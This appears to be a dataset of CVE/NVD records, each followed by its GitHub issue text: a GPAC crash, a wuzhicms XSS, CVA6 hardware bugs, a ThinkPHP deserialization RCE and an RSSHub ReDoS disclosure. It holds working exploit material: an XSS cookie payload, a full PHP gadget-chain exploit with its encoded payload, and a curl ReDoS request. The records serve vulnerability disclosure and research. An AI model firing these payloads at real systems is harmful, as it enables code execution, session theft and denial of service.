[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/issues/1906" }, { "source": "cve@mitre.org", "tags": null, "url": "https://www.debian.org/security/2023/dsa-5411" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/issues/1906" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://www.debian.org/security/2023/dsa-5411" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:gpac:gpac:1.1.0:-:*:*:*:*:*:*", "matchCriteriaId": "13133329-701B-4D4B-BA02-F2DF80638668", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "476" ]
476
https://github.com/gpac/gpac/issues/1906
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "gpac", "gpac" ]
Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue - thank you! - [x] I looked for a similar issue and couldn't find any. - [x] I tried with the latest version of GPAC. Installers available at http://gpac.io/downloads/gpac-nightly-builds/ - [x] I give enough information for contributors to reproduce my issue (meaningful title, github labels, platform and compiler, command-line ...) Step to reproduce: ``` 1.get latest commit code (GPAC version 1.1.0-DEV-rev1170-g592ba2689-master) 2.compile with --enable-sanitizer 3.run ./gpac nhmlr:reframe=1:gpac:index=1.0:gpac:src= ``` **Im not sure if it's a correct usage of "nhmlr filter" , or by which way could i parse nhml file?** Env: Ubunut 20.04 , clang 12.0.1 ASAN report ``` ==2311904==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 (pc 0x7fa16d0fb321 bp 0x7fff730acdb0 sp 0x7fff730acc20 T0) ==2311904==The signal is caused by a READ memory access. ==2311904==Hint: address points to the zero page. #0 0x7fa16d0fb321 in gf_filter_pid_get_packet /home/lly/pro/gpac_public/src/filter_core/filter_pid.c:5394:6 #1 0x7fa16d22468a in nhmldmx_process /home/lly/pro/gpac_public/src/filters/dmx_nhml.c:1320:8 #2 0x7fa16d15a431 in gf_filter_process_task /home/lly/pro/gpac_public/src/filter_core/filter.c:2441:7 #3 0x7fa16d13d2a7 in gf_fs_thread_proc /home/lly/pro/gpac_public/src/filter_core/filter_session.c:1640:3 #4 0x7fa16d13c850 in gf_fs_run /home/lly/pro/gpac_public/src/filter_core/filter_session.c:1877:2 #5 0x4d12ed in gpac_main /home/lly/pro/gpac_public/applications/gpac/main.c:2254:7 #6 0x7fa16c0210b2 in __libc_start_main /build/glibc-eX1tMB/glibc-2.31/csu/../csu/libc-start.c:308:16 #7 0x41fe0d in _start (/home/lly/pro/gpac_public/bin/gcc/gpac+0x41fe0d) AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV /home/lly/pro/gpac_public/src/filter_core/filter_pid.c:5394:6 in gf_filter_pid_get_packet ```
Null pointer reference in GPAC at src/filter_core/filter_pid.c:5394
https://api.github.com/repos/gpac/gpac/issues/1906/comments
4
2021-09-01T07:25:03Z
2021-09-07T15:18:06Z
https://github.com/gpac/gpac/issues/1906
984,803,968
1,906
3,802
CVE-2020-19897
2022-06-28T22:15:07.810
A reflected Cross Site Scripting (XSS) in wuzhicms v4.1.0 allows remote attackers to execute arbitrary web script or HTML via the imgurl parameter.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/wuzhicms/wuzhicms/issues/183" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/wuzhicms/wuzhicms/issues/183" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:wuzhicms:wuzhi_cms:4.1.0:*:*:*:*:*:*:*", "matchCriteriaId": "F4749403-9C42-40DF-A695-A9E31BD37D84", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/wuzhicms/wuzhicms/issues/183
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "wuzhicms", "wuzhicms" ]
A xss vulnerability was discovered in WUZHI CMS 4.1.0 There is a reflected XSS vulnerability which allows remote attackers to inject arbitrary web script or HTML via the imgurl parameter of /index.php?m=core&f=index&_su=wuzhicms. POC ji</textarea> <img/src=1 onerror=alert(document.cookie)> Vulnerability trigger point http://localhost/index.php?m=core&f=index&_su=wuzhicms. When attacker access -system settings - basic settings, Write poc in the statcode form , then XSS vulnerability is triggered successfully. 1、choose this part and write poc to [statcode] form ![image](https://user-images.githubusercontent.com/13130156/62277899-aa236680-b479-11e9-9135-0b0259ef3db2.png) 2、submit and view webpage ![image](https://user-images.githubusercontent.com/13130156/62277796-76484100-b479-11e9-97fa-42d8ce4c1607.png)
wuzhicms v4.1.0 statcode reflected xss vulnerability
https://api.github.com/repos/wuzhicms/wuzhicms/issues/183/comments
0
2019-08-01T08:29:05Z
2019-08-01T08:30:33Z
https://github.com/wuzhicms/wuzhicms/issues/183
475,546,565
183
3,803
CVE-2022-33021
2022-06-29T12:15:07.887
CVA6 commit 909d85a accesses invalid memory when reading the value of MHPMCOUNTER30.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 5, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/openhwgroup/cva6/issues/884" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/openhwgroup/cva6/issues/884" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:openhwgroup:cva6:-:*:*:*:*:*:*:*", "matchCriteriaId": "D73073CF-1196-4ABF-A8AE-3BE51A34519C", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "125" ]
125
https://github.com/openhwgroup/cva6/issues/884
[ "Exploit", "Third Party Advisory" ]
github.com
[ "openhwgroup", "cva6" ]
Hi, CVA6 RTL is returning unknown value ("xxxxxxxx") when reading the value of MHPMCOUNTER30. This is happening because the csr reg data (```csr_rdata```) is being read from ``perf_counter_d`` array in the perf_counters.sv module with an array index outside its range. The range of ``perf_counter_d`` is [riscv::CSR_MIF_EMPTY : riscv::CSR_ML1_ICACHE_MISS] (line:46 from perf_counter.sv file), but in line: 282 of csv_regfile.sv we are using the array to access array index riscv::CSR_MHPM_COUNTER_30, which is greater than the range of [riscv::CSR_MIF_EMPTY : riscv::CSR_ML1_ICACHE_MISS]. Please find attached the triggering input mem file, spike_trace_log, and cva6_trace_log. We can see from the line:83 of cva6 trace log that the read data is ``xxxxxxxx`` ![image](https://user-images.githubusercontent.com/79608200/170143824-8a519bdf-ccc3-4126-9a81-790e50020b83.png) [outofrange.zip](https://github.com/openhwgroup/cva6/files/8766647/outofrange.zip)
[Bug Report] Out of bound array access
https://api.github.com/repos/openhwgroup/cva6/issues/884/comments
7
2022-05-24T22:43:58Z
2023-12-13T21:43:08Z
https://github.com/openhwgroup/cva6/issues/884
1,247,200,381
884
3,804
CVE-2022-33023
2022-06-29T12:15:07.937
CVA6 commit 909d85a gives incorrect permission to use special multiplication units when the format of instructions is wrong.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 5, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/openhwgroup/cva6/issues/885" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/openhwgroup/cva6/issues/885" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:openhwgroup:cva6:-:*:*:*:*:*:*:*", "matchCriteriaId": "D73073CF-1196-4ABF-A8AE-3BE51A34519C", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "276" ]
276
https://github.com/openhwgroup/cva6/issues/885
[ "Issue Tracking", "Third Party Advisory" ]
github.com
[ "openhwgroup", "cva6" ]
Hi, The RISC-V ISA Volume I, 20190608, page 43 mentions: "MULH[[S]U] rdh, rs1, rs2; MUL rdl, rs1, rs2 (source register specifiers must be in same order and rdh cannot be the same as rs1 or rs2)" ![image](https://user-images.githubusercontent.com/79608200/170154875-91a5238a-9b8d-4fc5-8d7a-6ef193ef5f70.png) Our testcase shows cva6 will not throw illegal instruction exception in this case while spike does at line 84. ![image](https://user-images.githubusercontent.com/79608200/170155008-0d8d99f5-10ef-4ecd-90a5-33209612369a.png) The testcase mem file, rtl trace log, and spike trace log are attached. [missexcept.zip](https://github.com/openhwgroup/cva6/files/8767083/missexcept.zip) Thank you
[Bug report] miss illegal instruction exception when rd of MULHU is the same as rs1 or rs2
https://api.github.com/repos/openhwgroup/cva6/issues/885/comments
12
2022-05-25T00:52:21Z
2023-11-02T13:49:10Z
https://github.com/openhwgroup/cva6/issues/885
1,247,271,466
885
3,805
CVE-2022-33107
2022-06-29T12:15:07.983
ThinkPHP v6.0.12 was discovered to contain a deserialization vulnerability via the component vendor\league\flysystem-cached-adapter\src\Storage\AbstractCache.php. This vulnerability allows attackers to execute arbitrary code via a crafted payload.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/top-think/framework/issues/2717" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/top-think/framework/issues/2717" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:thinkphp:thinkphp:6.0.12:*:*:*:*:*:*:*", "matchCriteriaId": "F3201EB1-17FE-4E3C-86F5-6821F5D17FA8", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "502" ]
502
https://github.com/top-think/framework/issues/2717
[ "Exploit", "Third Party Advisory" ]
github.com
[ "top-think", "framework" ]
# ThinkPHP RCE链子 **Environment installation** test version:Thinkphp6.0.12 Environment configuration:(tp6只支持用composer安装) composer create-project topthink/think=6.0.12 tp612 Add deserialization entry point ```php <?php namespace app\controller; use app\BaseController; use think\facade\Request; class Index extends BaseController { public function index() { $payload=Request::post('cmd'); unserialize($payload); } public function hello($name = 'ThinkPHP6') { return 'hello,' . $name; } } ``` ``` direct interview http://127.0.0.1 post to send package ``` ```php cmd=O%3A17%3A%22think%5Cmodel%5CPivot%22%3A4%3A%7Bs%3A21%3A%22%00think%5CModel%00lazySave%22%3Bb%3A1%3Bs%3A12%3A%22%00%2A%00withEvent%22%3Bb%3A0%3Bs%3A8%3A%22%00%2A%00table%22%3BO%3A15%3A%22think%5Croute%5CUrl%22%3A4%3A%7Bs%3A6%3A%22%00%2A%00url%22%3Bs%3A2%3A%22a%3A%22%3Bs%3A9%3A%22%00%2A%00domain%22%3Bs%3A27%3A%22%3C%3Fphp+phpinfo%28%29%3B+exit%28%29%3B+%3F%3E%22%3Bs%3A6%3A%22%00%2A%00app%22%3BO%3A16%3A%22think%5CMiddleware%22%3A1%3A%7Bs%3A7%3A%22request%22%3Bi%3A2333%3B%7Ds%3A8%3A%22%00%2A%00route%22%3BO%3A20%3A%22think%5Cconsole%5COutput%22%3A2%3A%7Bs%3A9%3A%22%00%2A%00styles%22%3Ba%3A1%3A%7Bi%3A0%3Bs%3A13%3A%22getDomainBind%22%3B%7Ds%3A28%3A%22%00think%5Cconsole%5COutput%00handle%22%3BO%3A21%3A%22League%5CFlysystem%5CFile%22%3A2%3A%7Bs%3A7%3A%22%00%2A%00path%22%3Bs%3A10%3A%22huahua.php%22%3Bs%3A13%3A%22%00%2A%00filesystem%22%3BO%3A25%3A%22think%5Csession%5Cdriver%5CFile%22%3A0%3A%7B%7D%7D%7D%7Ds%3A17%3A%22%00think%5CModel%00data%22%3Ba%3A1%3A%7Bi%3A0%3Bs%3A6%3A%22huahua%22%3B%7D%7D ``` access`sess_huahua.php` successfully RCE ![20220524104905](https://user-images.githubusercontent.com/63102521/170851173-b61b92e0-ae3b-4bcf-ad4c-1911f431fc7d.png) exp ```php <?php namespace think\model\concern{ trait Attribute{ private $data = ['huahua']; } } namespace think\view\driver{ class Php{} } namespace think\session\driver{ class File{ } } namespace League\Flysystem{ class File{ protected $path; protected $filesystem; public function __construct($File){ $this->path='huahua.php'; $this->filesystem=$File; } } } namespace think\console{ use League\Flysystem\File; class Output{ protected $styles=[]; private $handle; public function __construct($File){ $this->styles[]='getDomainBind'; $this->handle=new File($File); } } } namespace think{ abstract class Model{ use model\concern\Attribute; private $lazySave; protected $withEvent; protected $table; function __construct($cmd,$File){ $this->lazySave = true; $this->withEvent = false; $this->table = new route\Url(new Middleware,new console\Output($File),$cmd); } } class Middleware{ public $request = 2333; } } namespace think\model{ use think\Model; class Pivot extends Model{} } namespace think\route{ class Url { protected $url = 'a:'; protected $domain; protected $app; protected $route; function __construct($app,$route,$cmd){ $this->domain = $cmd; $this->app = $app; $this->route = $route; } } } namespace{ echo urlencode(serialize(new think\Model\Pivot('<?php phpinfo(); exit(); ?>',new think\session\driver\File))); } ```
ThinkPHP 6.0.12 Unserialize RCE
https://api.github.com/repos/top-think/framework/issues/2717/comments
18
2022-05-24T07:16:25Z
2024-02-26T09:20:26Z
https://github.com/top-think/framework/issues/2717
1,246,093,065
2,717
3,806
CVE-2022-31110
2022-06-29T18:15:08.973
RSSHub is an open source, extensible RSS feed generator. In commits prior to 5c4177441417 passing some special values to the `filter` and `filterout` parameters can cause an abnormally high CPU. This results in an impact on the performance of the servers and RSSHub services which may lead to a denial of service. This issue has been fixed in commit 5c4177441417 and all users are advised to upgrade. There are no known workarounds for this issue.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 5, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "LOW", "baseScore": 5.3, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 1.4, "source": "security-advisories@github.com", "type": "Secondary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "security-advisories@github.com", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/DIYgod/RSSHub/commit/5c4177441417b44a6e45c3c63e9eac2504abeb5b" }, { "source": "security-advisories@github.com", "tags": [ "Exploit", "Issue Tracking", "Mitigation", "Third Party Advisory" ], "url": "https://github.com/DIYgod/RSSHub/issues/10045" }, { "source": "security-advisories@github.com", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/DIYgod/RSSHub/security/advisories/GHSA-jvxx-v45p-v5vf" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/DIYgod/RSSHub/commit/5c4177441417b44a6e45c3c63e9eac2504abeb5b" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Mitigation", "Third Party Advisory" ], "url": "https://github.com/DIYgod/RSSHub/issues/10045" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/DIYgod/RSSHub/security/advisories/GHSA-jvxx-v45p-v5vf" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:rsshub:rsshub:*:*:*:*:*:node.js:*:*", "matchCriteriaId": "9AA9F16E-B0E9-4D3B-8303-B1FD35978982", "versionEndExcluding": "2022-06-21", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "1333" ]
1333
https://github.com/DIYgod/RSSHub/issues/10045
[ "Exploit", "Issue Tracking", "Mitigation", "Third Party Advisory" ]
github.com
[ "DIYgod", "RSSHub" ]
**The vulnerability has been fixed (refer to the [security advisory](https://github.com/DIYgod/RSSHub/security/advisories/GHSA-jvxx-v45p-v5vf)).** According to the consultation with @DIYgod, this is a complete disclosure of the vulnerability report, disclosed 120 hours after the fix commit. [**For a better reading experience, download the PDF here.**](https://github.com/DIYgod/RSSHub/files/8987350/Vulnerability.Report.-.rev6.pdf) 简要的简体中文翻译附在下一条回复。 # Vulnerability Report (RSSHub) **Regular expression Denial of Service (ReDoS)** **Catastrophic Backtracking in User-supplied Regular Expression** Author: Rongrong (@Rongronggg9) ## POC _After reporting to the repository owner, the vulnerability has been fixed (refer to the [security advisory](https://github.com/DIYgod/RSSHub/security/advisories/GHSA-jvxx-v45p-v5vf)). To reproduce the vulnerability, a version before 041cfc376e41f361218cce4ed0ef04c8eff56179 (inclusive) is needed. [`diygod/rsshub:2022-06-20`](https://hub.docker.com/layers/rsshub/diygod/rsshub/2022-06-20/images/sha256-5c1e16c0e1ace16895ae536d9d6fa5b09f2c4a2aa6e3e4ca85ddf226c1aa3225?context=explore) is the last vulnerable Docker image._ 1. Follow the [official guide](https://github.com/DIYgod/RSSHub/blob/1d6e7d8a1df26ccd8a2156dbd8665097e077c6c6/docs/en/install/README.md) to deploy an RSSHub instance in any method (except Vercel or GAE). 2. `curl 'http://example.com/test/complicated?filter=%28%5B%5E%3C%3E%27%22%5D%2B%29%2A%22%3C&filterout=%28%5B%5E%3C%3E%27%22%5D%2B%29%2A%22%3C'` 3. The instance is now unresponsive to any request (Denial of Service). 4. Monitor the CPU usage of the process `node index.js`. It is now always occupying a whole CPU core. It can last for at least several hours. ## EXP `example.com` is an RSSHub instance. `/test/complicated` can be nearly any "route" of RSSHub, here is a randomly chosen "test route". `filter`, `filter_title`, `filter_description`, `filter_author`, `filterout`, `filterout_title`, `filterout_description`, and `filterout_author` are all so-called parameters of RSSHub, which can be supplied in the URI query. These parameters accept user-supplied regular expressions with unconditional trust, then call `String.match()` to perform regular expression matches. All of these parameters are vulnerable. `%28%5B%5E%3C%3E%27%22%5D%2B%29%2A%22%3C` is the URL encoded form of the regular expression /`([^<>'"]+)*"<`/. The POC shows a catastrophic-backtracking-vulnerable regular expression specially designed for any HTML. But most catastrophic-backtracking-vulnerable regular expression may be able to construct an effective DoS attack (refer to the "Look back" chapter for more details). Once catastrophic backtracking occurs, `String.match()` can take more than several hours to finish. <ins>There is no timeout enforced, causing the ReDoS attack to become "zero-cost": attack once, down for hours.</ins> On multi-core servers, the ReDoS attack can probably only affect the RSSHub instance itself; while <ins>on single-core servers, especially VPS[^1], it can be a disaster.</ins> The component cannot be disabled. <ins>Every RSSHub instance is vulnerable "out-of-box"</ins> unless additional access control is applied. If an external watchdog or timeout is enforced (e.g. Vercel, GAE), the downtime of each effective attack can be limited. However, the instance must be terminated first in order to resume it, so the attack cost is still too low. [^1]: Most VPS providers take the advantage of a technology called "CPU credits". If a VPS has a high CPU load continuously, it can possibly consume all remaining CPU credits, causing the VPS provider to limit the performance to a fairly low level. Even if the high load ends, it can take at least several hours before there are enough CPU credits to make the performance resume. ## Vulnerable version Since Git hash 4671720f4c5e1aaaad8fcc1dce684b6546baf2ff, Pull Request #3910 on GitHub, which was merge on Feb 9, 2020 (28.5 months ago). _Fixed in 5c4177441417b44a6e45c3c63e9eac2504abeb5b._ ## Condition to be vulnerable Unless additional access control is applied. If an external watchdog or timeout is enforced, the downtime can be limited but the instance is still vulnerable. ## Vulnerability grade High. ## Possible fix Either: 1. Drop the regular expression match feature completely and roll back to string match. 2. Enforce additional permission check when accepting user-supplied regular expressions. 3. Migrate to a backtracking-free regular expression engine. 4. (not really[^2] a "fix") Enforce a timeout when performing a regular expression match. 5. (not really[^3] a "fix") Disable the feature by default and require each instance maintainer to manually enable it. [^2]: The attack cost is still too low. [^3]: Still vulnerable if manually enabled and matching the "condition to be vulnerable". ## Timeline Considering the fix of the vulnerability is simple, I prefer a 28+7 days timeline (UTC). ### Jun 21, 2022 (Day 0) * Vulnerability found. * Vulnerability reported. ### Jul 5, 2022 (Day 14) * If the email to i@diygod.me gets no response, I will immediately open an issue in the [GitHub repository](https://github.com/DIYgod/RSSHub), only informing maintainers there is a DoS vulnerability without disclosing any vulnerability detail. ### Jun 22, 2022 - Jul 19, 2022 (Day 1 - Day 28) * If a fix is committed and pushed to the GitHub repository during this period, I will wait for 120 hours in order that maintainers can disclose a [security advisory](https://github.com/DIYgod/RSSHub/security/advisories) on GitHub. No matter whether the security advisory has been disclosed or not, once the 120-hour deadline is exceeded, I will immediately disclose the full report[^4] by opening an [issue in the GitHub repository](https://github.com/DIYgod/RSSHub/issues). ### Jul 20, 2022 - Jul 26, 2022 (Day 29 - Day 35) * Once a fix is committed and pushed to the GitHub repository during this period, I will immediately disclose the full report by opening an issue in the GitHub repository. ### Jul 27, 2022 (Day 36) * If no fix was committed and pushed to the GitHub repository during the previous two periods, I will immediately disclose the full report by opening an issue in the GitHub repository. ### Additional conditions * Maintainers may ask me to disclose the full report before exceeding the 120-hour deadline. * Maintainers may consult with me to determine a new timeline, but that consultation must be disclosed along with the full report. * If being replied "won't fix" or "not a vulnerability", I will immediately disclose the full report along with the reply by opening an issue in the GitHub repository. * I reserve the right to apply for a CVE-ID. [^4]: What you are reading. ## Timeline (in reality) ### Jun 21, 2022 15:31 UTC (0h) * Vulnerability reported. ### Jun 21, 2022 15:56 UTC (0.4h) * Vulnerability fixed. * Replace the regular expression engine with a backtracking-free one (`RE2`). * Git hash: 5c4177441417b44a6e45c3c63e9eac2504abeb5b ### Jun 21, 2022 17:52 UTC (2.4h) * The fix was confirmed to be effective. ### Jun 22, 2022 10:43 UTC (19.2h) * The [security advisory](https://github.com/DIYgod/RSSHub/security/advisories/GHSA-jvxx-v45p-v5vf) was published. ### Jun 22, 2022 19:25 UTC (27.9h) * Two commits "for backward compatibility" opened up the attack surface again by allowing instance maintainers to switch back to the vulnerable regular expression engine. * Git hash: e4478a366ce179671c4f1bd2f0cff95985da44ea * Pull request: #10013 * Git hash: dc64debaf77f57b593f7b2a451298f350a084a97 * Pull request: #10014 * Since they were created by a maintainer (@NeverBehave) and approved by the repository owner (@DIYgod), I choose not to consider it as a vulnerability but document it here for warning (refer to the next chapter). ### Jun 26, 2022, 15:56 UTC (120.4h) * The full report was able to be disclosed. ## Look back <ins>A ReDoS attack is usually severe but cost-less, "defeating the strong with little effort".</ins> Carelessness and the over-trust in the regular expression engine requiring backtracking are the root causes of a ReDoS vulnerability, while the common immediate causes are: 1. A regular expression engine requiring backtracking, and 2. A catastrophic-backtracking-vulnerable regular expression, and 3. A user-supplied malicious strings. ReDoS vulnerabilities are not very common since there must be a catastrophic-backtracking-vulnerable regular expression, which is usually written by programmers and out of the control of end-users. <ins>But in this vulnerability of RSSHub, things are different: both the regular expression and the string can be user-supplied.</ins> In the POC, I merely showed how to supply a vulnerable regular expression. So how to understand why the string can also be user-supplied? A fact is that some "routes" (e.g. `/twitter/user/:username`) grab posts from social media, resulting in anyone being able to post malicious strings and request RSSHub to grab them. An experienced attacker may merely construct a vulnerable regular expression specially designed for some strings just like the one I have demonstrated. While an inexperienced attacker can easily use known combinations of vulnerable regular expressions and malicious strings. As a result, <ins>everyone who knows what catastrophic backtracking is can probably construct an effective attack</ins>. The fix adopts an alternative regular expression engine (`RE2`) which is backtracking-free. It is quite simple, but effective. It shows a nice example with functionality and security balanced. However, as mentioned, two commits (refer to the previous chapter) have opened up the attack surface again in certain conditions. Those commits re-empower instance maintainers to switch back to the vulnerable regular expression engine, the vanilla built-in-JavaScript one (`RegExp`). To be responsible, I warn instance maintainers again not to switch back to `RegExp` unless: * [Additional access control](https://github.com/DIYgod/RSSHub/blob/master/docs/en/install/README.md#access-control-configuration) is applied, or * Your instance does not expose to the 